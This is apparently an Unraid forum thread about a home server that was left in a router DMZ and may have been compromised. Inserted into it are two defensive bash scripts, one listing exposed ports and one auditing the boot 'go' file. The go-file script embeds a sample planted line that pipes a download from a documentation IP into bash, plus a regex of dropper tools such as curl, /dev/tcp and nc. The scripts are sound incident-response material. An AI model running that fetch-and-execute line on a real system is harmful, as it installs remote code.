Suspected Hacking!


DjW0mbat


Hi all!

 

I started a completely different question relating to my access to my Plex media and the apparent disappearance of the port mapping in my docker here, but someone pointed out a bunch of dodgy activity going on, with spammed connections coming in from worrying locations. I have shut the server down since and am desperately trying to figure out what went wrong.

 

Does anyone know (i) if I might have already been compromised somehow, and/or (ii) what mistakes I have made here? 

 

There should only be two open ports on my router, 51820 for WireGuard and 32400 for Plex. I also have the Cloudflare DynDNS docker that tracks my IP address and is linked to my Cloudflare account to point to my domain, but I have not managed to get that working yet.

 

I would really appreciate any help on this, obviously it's quite a stressful thing to see. 

 

Thanks in advance!

 

mackiemedia-diagnostics-20210818-0932 2.zip

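The first thing to establish in a situation like this is what the box was actually exposing, not what the router was meant to forward: once a host sits in a DMZ, every socket bound to a non-loopback address is reachable, not just the two ports the owner remembers. The script below is an added example, not code from the thread or from Unraid. It parses `ss -tulnp`-style output (the listing embedded here is constructed, not taken from the poster's diagnostics) and prints every exposed proto/port that is not in the allowed set, which here is the poster's WireGuard and Plex ports.

```shell
#!/bin/bash
# Added example (not from the original post): compare what a host is actually
# listening on with the ports its owner believes are exposed.
# Assumptions: input is in the column layout of `ss -tulnp` (Netid, State,
# Recv-Q, Send-Q, Local Address:Port, Peer, Process); the sample below is constructed.

# Ports the poster expects to be reachable: WireGuard (UDP) and Plex (TCP).
ALLOWED="udp/51820 tcp/32400"

# Constructed sample in `ss -tulnp` format (header already stripped). Not real data.
SAMPLE_SS='udp   UNCONN 0 0   0.0.0.0:51820   0.0.0.0:* users:(("wireguard",pid=1,fd=3))
tcp   LISTEN 0 128 0.0.0.0:32400   0.0.0.0:* users:(("Plex Media Server",pid=1234,fd=5))
tcp   LISTEN 0 128 0.0.0.0:22      0.0.0.0:* users:(("sshd",pid=900,fd=3))
tcp   LISTEN 0 128 127.0.0.1:8080  0.0.0.0:* users:(("nginx",pid=800,fd=6))
tcp   LISTEN 0 128 0.0.0.0:445     0.0.0.0:* users:(("smbd",pid=950,fd=4))'

# Read ss lines on stdin; print "proto/port" for each socket bound to a
# non-loopback address (those are the ones a DMZ forwards to the internet).
exposed_sockets() {
    awk '{
        n = split($5, a, ":"); port = a[n];
        addr = substr($5, 1, length($5) - length(port) - 1);
        if (addr != "127.0.0.1" && addr != "[::1]") print $1 "/" port
    }'
}

# Read ss lines on stdin; print only the exposed sockets that are not in ALLOWED.
unexpected_sockets() {
    exposed_sockets | while read -r s; do
        case " $ALLOWED " in
            *" $s "*) ;;          # expected
            *) echo "$s" ;;       # anything else was reachable from the DMZ
        esac
    done
}

# Demo on the constructed sample. On a real host you would feed it
#   ss -tulnp | tail -n +2 | unexpected_sockets
echo "Exposed but not in the allowed list:"
printf '%s\n' "$SAMPLE_SS" | unexpected_sockets
```

In the constructed sample the check flags SSH (22/tcp) and SMB (445/tcp): neither was in the poster's mental list of two ports, but both would have been Internet-facing while the server sat in the DMZ. Run the live form on the server while it is still isolated from the Internet, then close or firewall whatever it reports.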

I just checked and found that the server seems to have been in the DMZ... really, really concerning. I think I put it in there early on and forgot to remove it, a completely stupid thing to do!!

 

I have a strong root password, how long would it have taken for my server to get compromised? I really need to be able to see which data would have been accessed etc. 

 

Tried turning on the server but I can't seem to access it locally anymore. What's going on? 


 

1 minute ago, JonathanM said:

Did you have a static IP configured?

Yeah I did

 

I've currently taken the Ethernet cable out to avoid any further issues. I booted into the GUI directly, hoping to see if I can figure out what happened from there. Where should I look for evidence of hacking?

 

 

2 minutes ago, DjW0mbat said:

where should I look for evidence of hacking? 

Because of the way Unraid is built, typical hacks are undone every reboot. The go file is about the only place I've seen ongoing hacks planted. Other than that, if all your data is there and not deleted or corrupted, and there are no unexpected containers or VMs, then you are probably OK. There is no way I am aware of to see what was accessed.

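The reply above names the two things worth checking after a reboot has wiped the in-memory system: the go file on the boot flash, and the container list. The script below is an added example, not code from the thread or from Unraid, that does both. It assumes a stock go file contains only the shebang, comments and the line `/usr/local/sbin/emhttp &`, treats anything else as non-default, and flags non-default lines that match a hand-picked list of dropper idioms (that regex is an assumption, not an authoritative indicator list). If the real go file is not present it audits a constructed sample containing two planted lines; the address in that sample is from the documentation range and is not a real attacker.

```shell
#!/bin/bash
# Added example, not code from the original thread or from Unraid. Checks the
# persistence spot named in the reply (the go file) and lists containers.
# Assumptions: a stock go file holds only the shebang, comments and
# "/usr/local/sbin/emhttp &"; SUSPICIOUS_RE is a hand-picked list, not exhaustive.

GO_FILE="${GO_FILE:-/boot/config/go}"

# Idioms commonly seen in planted startup lines (constructed list, not exhaustive).
SUSPICIOUS_RE='curl|wget|base64|/dev/tcp|nc |ncat|nohup|crontab|chmod \+x|python -c|perl -e|xmrig|minerd'

# Write a constructed sample go file with two planted lines to PATH (demo only).
make_sample_go() {
    cat > "$1" <<'EOF'
#!/bin/bash
# Start the Management Utility
/usr/local/sbin/emhttp &
# --- constructed example of planted persistence; 198.51.100.7 is a documentation address ---
nohup /boot/custom/update.sh >/dev/null 2>&1 &
curl -s http://198.51.100.7/x | bash
EOF
}

# Print every line of a go file that is not blank, a comment, or the stock emhttp line.
nondefault_lines() {
    grep -vE '^[[:space:]]*(#|$)' "$1" | grep -vxF '/usr/local/sbin/emhttp &' || true
}

# Print how many non-default lines match SUSPICIOUS_RE (case-insensitive).
count_suspicious() {
    local n
    n=$(nondefault_lines "$1" | grep -ciE "$SUSPICIOUS_RE") || true
    echo "${n:-0}"
}

# Full report on one go file. Exit status 1 when something suspicious was found.
audit_go_file() {
    local f="$1" n
    echo "== non-default lines in $f =="
    nondefault_lines "$f"
    n=$(count_suspicious "$f")
    echo "== $n line(s) match dropper idioms =="
    nondefault_lines "$f" | grep -iE "$SUSPICIOUS_RE" || true
    [ "$n" -eq 0 ]
}

# Unexpected containers are the other thing to look for; only runs where docker exists.
list_containers() {
    command -v docker >/dev/null 2>&1 || { echo "docker not available here"; return 0; }
    docker ps -a --format '{{.Names}}\t{{.Image}}\t{{.Status}}' 2>/dev/null \
        || echo "docker daemon not reachable"
}

if [ -r "$GO_FILE" ]; then
    target="$GO_FILE"
else
    target=$(mktemp)
    make_sample_go "$target"
    echo "(no $GO_FILE here; auditing a constructed sample at $target)"
fi
if audit_go_file "$target"; then
    echo "go file looks stock"
else
    echo "REVIEW the lines above before booting with the network connected"
fi
echo "== containers =="
list_containers
```

A clean result from this is only as strong as the assumption behind it: a stock go file should be nearly empty, so read every non-default line yourself rather than relying on the regex, and compare the container list against what you installed.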

Okay, and how could I access the go file? 

 

I'm looking through things in the safe mode GUI and it seems that everything is relatively normal. Does this mean that I wasn't hacked? I have some sensitive data on there so I would really like to be able to see if that was accessed/copied. 

 

I also still can't seem to access the server through its fixed IP, which is worrying me. What could that mean?

 

Sorry for all the questions, this has made me really anxious! Lesson well and truly learned...


Same just happened here, couldn't access through the IP. The server was revving up, worrying me. Hard shutdown/restarted and now I have access, but not sure what happened. Had an odd IP that kept connecting to the server (pfSense logs). Wasn't sure if I was getting hacked also, but I did just download the new Unraid beta recently and signed in, so not sure if it's something to do with that. You said you unplugged the Ethernet though, so maybe you forgot and that's why you cannot log in?

7 minutes ago, DjW0mbat said:

do you think it looks like someone ended up gaining access to my server?

If the only thing they did was look around and download files, there is no way I know of to tell after the fact. However, most intrusions aren't just for browsing; they are trying to make money. They do that by either encrypting your files and asking for a ransom to decrypt them, or by installing remote-controlled software that mines cryptocurrency, attacks other machines, or does whatever they tell it to do.

 

So, no, odds are that they didn't gain full access, or didn't attack it properly and Unraid's unconventional architecture foiled their efforts.
